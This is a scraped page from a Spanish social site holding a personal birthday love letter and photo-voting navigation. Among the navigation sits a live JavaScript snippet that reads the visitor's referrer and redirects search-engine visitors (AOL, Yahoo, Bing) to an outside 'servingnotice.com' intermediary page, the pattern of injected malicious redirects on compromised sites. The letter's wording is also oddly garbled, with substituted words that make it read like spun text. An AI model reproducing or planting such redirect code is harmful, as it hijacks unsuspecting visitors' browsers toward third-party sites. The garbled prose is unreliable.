Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
130.443
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;
Cursos, Masters y Oposiciones
Las mejores inocentadas para el 28 de diciembre
 

Alfredo Cisneros

Alfredo Cisneros  
51
Las Palmas  
   

Carta

Feliz día
[17-05-2012 19:25]

Feliz cumpleaños baby

Aspiro que en este día tan especial para ti amada, Dios te llene de muchas bendiciones y salud para ti, para tus hijos, y a todos los seres queridos de tu ambiente, que Dios permita continuamente alumbrar tu avenida y te atribuya la fortaleza y la comprensión para seguir ayudando a tu familia que tanto necesitan de ti; eres digna de ser admirada por esos gestos tan bonitos.

Lo que haces para tu familia es digno de asombrar, me incluyo entre ellos ya que me has procurado tanto amor en tan poco tiempo que tenemos de vivir juntos. Tu amor ha sido puro e incondicional. Siempre he dicho que la humildad es una virtud y tú has sido ofrecida de ella.
Te deseo lo mejor, y muchas escaladas hoy día y por siempre.

Te amo baby......y si me permites decir lo que dice Sofía: mi gestión será siempre demostrártelo, no solo por hoy que es tu día tan especial, sino eternamente, de la misma forma recíprocamente.

"Feliz cumpleaños Paola" yo quiero ser el amor de tu vida, y el que pase este y todos los cumpleaños que vengan junto a ti, mi amada.

En el siglo 20, atrás hace 30 años, te conocí cuando apenas eras una niñita, hoy día en el siglo presente, el destino me dio la oportunidad, la mejor oportunidad tan anhelada de toda mi vida, de conocer a la mujer, de conocerte a ti nuevamente; quiero darte imperecederas gracias una vez y un millón de veces mas por haberme aceptado en tu vida como el amor de tu vida!

Sinceramente

Tu Alfredo





Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda